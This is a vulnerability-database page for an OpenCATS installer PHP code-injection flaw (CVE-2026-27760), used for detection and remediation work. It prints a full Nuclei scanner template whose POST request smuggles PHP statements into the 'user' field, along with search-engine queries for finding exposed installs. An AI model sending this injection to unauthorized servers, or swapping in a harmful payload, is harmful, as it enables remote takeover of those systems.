Lucene search
+L

OpenCATS - Command Injection

🗓️ 17 Aug 2026 03:58:01Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

OpenCATS command injection via installer endpoint enables unauthenticated PHP execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-27760
28 Apr 202613:43
attackerkb
circl
Circl
CVE-2026-27760
28 Apr 202616:34
circl
cnnvd
CNNVD
OpenCats 代码注入漏洞
28 Apr 202600:00
cnnvd
cve
CVE
CVE-2026-27760
28 Apr 202613:43
cve
cvelist
Cvelist
CVE-2026-27760 OpenCATS PHP Code Injection via installer AJAX endpoint
28 Apr 202613:43
cvelist
euvd
EUVD
EUVD-2026-26052
28 Apr 202613:43
euvd
metasploit
Metasploit
OpenCATS Installer PHP Code Injection
28 Apr 202600:00
metasploit
nvd
NVD
CVE-2026-27760
28 Apr 202615:16
nvd
packetstorm
Packet Storm
📄 OpenCATS Installer PHP Code Injection
5 Aug 202600:00
packetstorm
ptsecurity
Positive Technologies
PT-2026-35727
28 Apr 202600:00
ptsecurity
Rows per page
id: CVE-2026-27760

info:
  name: OpenCATS - Command Injection
  author: theamanrawat
  severity: high
  description: |
    OpenCATS prior to commit 3002a29 contains a command injection caused by injection of PHP statements into the installer AJAX endpoint's databaseConnectivity action parameter, letting unauthenticated attackers execute arbitrary code, exploit requires incomplete installation wizard.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code remotely, leading to full system compromise.
  remediation: |
    Update to the version after commit 3002a29 or latest available version.
  reference:
    - https://chocapikk.com/posts/2026/opencats-installer-rce/
    - https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6
    - https://github.com/opencats/OpenCATS
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27760
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2026-27760
    epss-score: 0.34629
    epss-percentile: 0.98283
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"opencats"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve,cve2026,opencats,rce,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "!contains(body, 'installLocked')"
          - "contains(body, 'setActiveStep')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /ajax.php?f=install:ui&a=databaseConnectivity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=cats');echo+'{{randstr}}'.md5('{{randstr}}');//

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
        internal: true

  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body, '{{randstr}}' + md5('{{randstr}}'))"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100c487a748251984968b5a0cca8a8a9c75da0a17c05042ac509f3de01807f5db8402200588dfbd21c41a1b77800d8ec36fb21a8e23a23a19218226985fbce25e990078:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jun 2026 09:12Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.18.1
CVSS 49.2
EPSS0.34629
SSVC
23